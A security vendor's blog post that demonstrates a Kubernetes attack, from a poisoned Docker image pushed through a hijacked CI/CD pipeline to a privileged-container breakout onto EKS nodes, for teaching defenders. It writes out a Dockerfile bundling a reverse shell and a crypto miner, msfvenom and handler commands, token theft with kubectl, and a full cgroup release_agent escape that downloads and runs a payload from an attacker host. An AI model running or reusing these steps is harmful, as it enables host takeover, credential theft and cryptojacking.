Anatomy of a Kubernetes Attack - How Untrusted Docker Images Fail Us

PART TWO OF A SERIES.

 

This post illustrates how an attacker could use a poisoned Docker image to break out of a container and gain access to the hosts/nodes in a Kubernetes cluster.

 

In the first part of this blog series, Infrastructure as Code: Terraform, AWS EKS, Gitlab & Prisma Cloud, I went through the scenario of building out an Amazon EKS cluster using Terraform and a VCS integration with Gitlab. I also covered an initial DaemonSet deployment of the Palo Alto Networks Prisma agent to the nodes on the newly provisioned cluster. In this second part of the series, we will look at some aspects of a Kubernetes attack and, in a follow-up installment, at how Palo Alto Networks Prisma Compute can be used to prevent related Kubernetes attacks.

 

Microsoft recently released a Kubernetes attack matrix (similar to MITRE’s ATT&CK framework) that I feel is a good reference for walking through some aspects of an example Kubernetes attack. For this blog, I’ll be covering techniques in the Initial Access, Execution, Persistence and Privilege Escalation tactic phases.

 

Figure 1: Microsoft Kubernetes ATT&CK Matrix

 

The environment I’m using for this blog is an Amazon EKS cluster with no Prisma agents installed, which I’ll use to demonstrate the various stages of an attack. I also have a second EKS cluster running Prisma that I’ll use in the next blog to demonstrate how Prisma can protect the cluster. The CI/CD pipeline I’m using incorporates Gitlab Enterprise and a public Docker image repository. The command-and-control (C2) endpoint is a Metasploit console, also hosted in AWS.

 

Figure 2: Vulnerable Amazon EKS Cluster

 

Initial Access – Compromised Image

 

Imagine a scenario where a software developer unknowingly had their workstation compromised. During the breach, the attacker was able to collect the dev’s version control system (VCS) credentials. With the dev’s stolen credentials, the attacker plans to use the CI/CD pipeline to deploy a poisoned Docker image to the Kubernetes cluster. This could be done either by backdooring a trusted image and pushing the updated image to the trusted repository (as was done previously by Optiv’s Dan Kiraly in his Azure container breakout blog series) or by changing a callout in the CI/CD build code to pull the image from a different source, which, in my case, is a poisoned image in a public repository on Docker Hub.

 

In this scenario, I will work through deployment of the poisoned image into the cluster. This provides a foothold for an attacker to establish a beachhead and escalate privileges, depending on how the K8s cluster and its corresponding pods were deployed.

 

Figure 3: Docker Hub poisoned image

 

Figure 4: Changing the image repo path in gitlab-ci.yml from a trusted source to Docker Hub

 

The poisoned image was created offline and pushed to a publicly accessible Docker Hub repo (see above). For this image, I pulled ubuntu:latest from Docker Hub and loaded the necessary prerequisites, including curl, a reverse listener binary and the XMRig cryptocurrency mining software. Once the image functioned as expected, I pushed it to my public Docker Hub repo.
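
As a rough sketch, a build for that kind of poisoned image might look like the Dockerfile below. The file names, paths and the choice to bake the payload in at build time are illustrative assumptions, not the exact build used here:

# Hypothetical Dockerfile for the poisoned image (names and paths are illustrative)
FROM ubuntu:latest

# Prerequisite tooling
RUN apt-get update && apt-get install -y curl && rm -rf /var/lib/apt/lists/*

# Stage the attacker's binaries: a reverse-shell payload and the XMRig miner
COPY shell-x64.elf /usr/local/bin/shell-x64.elf
COPY xmrig /usr/local/bin/xmrig
RUN chmod +x /usr/local/bin/shell-x64.elf /usr/local/bin/xmrig

# On container start, call back to the attacker's handler
CMD ["/usr/local/bin/shell-x64.elf"]

From there, building and pushing the image is a standard "docker build -t optivrd/ubuntu:latest ." followed by "docker push optivrd/ubuntu:latest".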

 

Figure 4 above shows that I’ve changed the image path in the app’s Gitlab CI file from the trusted Gitlab/Ubuntu:Latest location to the poisoned image available at optivrd/ubuntu:latest on Docker Hub. The next time a deployment is triggered in the CI/CD pipeline, the poisoned image will be pulled from Docker Hub and used for the deployed container.
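
As a sketch of that change, the relevant fragment of the CI file might look something like this; the variable name, job name and kubectl step are assumptions for illustration, and only the image reference matters:

variables:
  # Before: trusted image location (Gitlab/Ubuntu:Latest)
  # APP_IMAGE: "Gitlab/Ubuntu:Latest"
  # After: poisoned public image on Docker Hub
  APP_IMAGE: "optivrd/ubuntu:latest"

deploy:
  stage: deploy
  script:
    # The deployment picks up whatever image the variable points at
    - kubectl set image deployment/app app=$APP_IMAGE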

 

Execution – Running untrusted code inside of a container

 

The poisoned image contains an embedded reverse listener that connects back to my Metasploit console and provides a shell when the container is deployed. Another option for getting the binary into the image would be modifying the dockerfile in the CI/CD pipeline either to download the file externally via CMD when the container starts or to include the file in the filesystem during the CI/CD build process.
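
For context, the attacker side of that callback could be prepared roughly as follows; the payload type, address and port are assumptions, not necessarily what was used in this environment:

# Generate the reverse-shell ELF that gets baked into (or downloaded by) the image
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<attacker-ip> LPORT=4444 -f elf -o shell-x64.elf

# Start a matching handler in the Metasploit console
msfconsole -q -x "use exploit/multi/handler; set payload linux/x64/shell_reverse_tcp; set LHOST 0.0.0.0; set LPORT 4444; run"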

 

Figure 5: Reverse listener session established through Metasploit

 

Figure 6: Session established with container spawned from the poisoned Docker image containing a cryptocurrency miner

 

Figure 7: Listing of the / partition of the container and the “whoami” command

 

We can see from the images above that the container has spawned a connection back to the Metasploit console. With some additional recon, we see that the filesystem is indeed that of a container (note the .dockerenv file located in /). We can also see from the “whoami” command that the container is running as root.
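
A few quick checks along those lines, as illustrative commands run in the new shell:

ls -la /            # a .dockerenv file in / is a strong hint we are inside a Docker container
whoami              # returns "root" here, i.e. the container process runs as root
cat /proc/1/cgroup  # cgroup paths mentioning "docker" or "kubepods" (cgroup v1) are another hint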

 

Persistence – Backdoor Container

 

Attackers who have gained partial access to a Kubernetes cluster can use existing weaknesses in the design and deployment of the cluster to establish persistence. Common issues include overly permissive access rights and failure to use Kubernetes’ native RBAC. In this scenario, the attacker modified the code in the CI/CD pipeline to attach a poisoned image during the container deployment process, so the attacker regains access to the cluster every time a container based on the poisoned image is deployed.

 

Armed with access and inherited permissions, an attacker could potentially capture the contents of the service account token mounted in the container. In our case, depending on how the container was deployed (e.g., privileged, separate service account, separate namespace), we may be able to get this useful information.

 

Figure 8: Directory listing of /run/secrets/kubernetes.io/serviceaccount

 

From the directory listing above, we can see that every file and folder on the container filesystem is owned by root. This indicates that either the container is running as privileged or the container is running as the root user; in either case, a bad practice. Checking the path /run/secrets/kubernetes.io/serviceaccount, we can see that the CA cert, namespace and token are available to us. Even with this information, we will still not be able to connect to the EKS API server, because we also need AWS API credentials, specifically the Access Key ID and Secret Access Key, which awscli requires for kubectl to connect directly.
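
For illustration, grabbing the mounted service account material from inside the container is as simple as reading those files:

cd /run/secrets/kubernetes.io/serviceaccount
cat namespace    # namespace the pod was deployed into
cat token        # JWT bearer token for the pod's service account
ls -la ca.crt    # CA certificate for the cluster's API server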

 

In cases where the API server is deployed and configured by the end user (as opposed to the Amazon EKS, Azure AKS and Google GKE managed Kubernetes services), the CA cert, namespace and token would be all that is needed to connect to the API server using kubectl.
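
A minimal sketch of that, assuming the attacker has also located the API server endpoint (the address below is a placeholder):

APISERVER=https://<api-server-address>:6443
TOKEN=$(cat /run/secrets/kubernetes.io/serviceaccount/token)

kubectl --server=$APISERVER \
        --certificate-authority=/run/secrets/kubernetes.io/serviceaccount/ca.crt \
        --token=$TOKEN \
        get pods --all-namespaces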

 

Some other examples of risky Kubernetes permissions include listing secrets, service accounts with privileged permissions, user impersonation and the ability to brute force token IDs using default service accounts. With that in mind, it should be noted that securing K8s clusters is a non-trivial exercise and is also difficult to maintain administratively. For example, a default kubeadm installation contains approximately 43 RoleBindings/ClusterRoleBindings, 51 Roles/ClusterRoles and 39 subjects. More information about container security issues and recommendations can be found in NIST SP 800-190.
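
One quick way to gauge how risky a captured token actually is (reusing the APISERVER and TOKEN variables from the sketch above) is to ask the API server what the token may do, and, from the defender’s side, to review the bindings that grant those rights:

# What is this service account allowed to do?
kubectl auth can-i --list --token=$TOKEN --server=$APISERVER \
        --certificate-authority=/run/secrets/kubernetes.io/serviceaccount/ca.crt

# Defender's view: enumerate the bindings that hand out those permissions
kubectl get clusterrolebindings
kubectl get rolebindings --all-namespaces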

 

Privilege Escalation – Breaking out of the Container

 

With my reverse listener session established, I now move on to escalating my foothold to the underlying hosts/nodes in the Kubernetes cluster. For this phase, I’ll exploit a vulnerability discovered by security researcher Felix Wilhelm and expanded on by the folks at Trail of Bits. This vulnerability affects Docker containers run with the --privileged flag set and works by abusing the Linux cgroup v1 “notify_on_release” feature. As this vulnerability demonstrates, launching privileged Docker containers is dangerous and should be avoided in almost all scenarios, due to the full access to the host’s devices and the lack of restrictions from seccomp, AppArmor and other Linux safeguards.

 

Inside the Docker container, I run the commands to escape the container. These include a curl request to download my Metasploit reverse listener, a chmod to set its executable bit and the execution of the payload on the underlying host.
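
A minimal sketch of that escape, based on the publicly documented release_agent technique and assuming the container really is privileged; the attacker address, file names and the choice of the rdma cgroup controller are placeholders/assumptions:

# 1. Mount a cgroup v1 controller (rdma is typically unused) and create a child cgroup
d=/tmp/cgrp && mkdir -p $d && mount -t cgroup -o rdma cgroup $d && mkdir -p $d/x

# 2. Ask the kernel to run a "release agent" on the HOST when the child cgroup empties
echo 1 > $d/x/notify_on_release

# 3. Work out where the container's root filesystem lives on the host (overlayfs upperdir)
host_path=$(sed -n 's/.*upperdir=\([^,]*\).*/\1/p' /etc/mtab)
echo "$host_path/breakout.sh" > $d/release_agent

# 4. Script the host will run: fetch the Metasploit payload, set the executable bit, run it
printf '#!/bin/sh\ncurl -o /shell-x64.elf http://<attacker-ip>/shell-x64.elf\nchmod +x /shell-x64.elf\n/shell-x64.elf &\n' > /breakout.sh
chmod +x /breakout.sh

# 5. Trigger: put a short-lived process in the cgroup; when it exits, the host runs the agent
sh -c "echo \$\$ > $d/x/cgroup.procs"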

 

Figure 9: Running the container breakout commands

 

After running the commands in the container’s shell, the Metasploit console shows that a host has connected back and a new session has been established. Running “uname -a”, I can see from the kernel version and information provided that this is one of my Kubernetes nodes, not the container. I also see that a .dockerenv file is not present in the root of the filesystem. Finally, I can see the shell-x64.elf binary that was downloaded and used for the connection back to my MSF console.
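
The same kind of sanity checks as earlier, now run from the host session (illustrative; the payload path follows the sketch above):

uname -a               # kernel string and hostname match the EKS worker node, not the container
ls -la /.dockerenv     # "No such file or directory": this is not a container filesystem
ls -la /shell-x64.elf  # the payload downloaded by the release agent for the callback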

 

Figure 10: Directory listing of the Kubernetes host after the container breakout

 

With access to the underlying Kubernetes hosts, I can continue moving through the different phases of the attack framework, including Defense Evasion, Credential Access, Discovery and Lateral Movement. My activity could potentially include wiping logs and establishing a more permanent presence on the nodes.

 

Hopefully this post helped you understand how a single workstation breach could impact an organization’s CI/CD pipeline and infrastructure. In the next blog installment, I’ll be looking at the techniques covered in this attack and demonstrate how Palo Alto Networks Prisma Compute can help to address issues in the CI/CD pipeline and Kubernetes cluster.

Sr. Research Scientist | Optiv
Rob Brooks has been involved in Information Security for 20 years and has served as a CISO, Senior Architect, Sysadmin and Engineer along the way. Rob currently works as a Sr. Research Scientist in Optiv's R&D group, managing the company’s private cloud and helping research security products.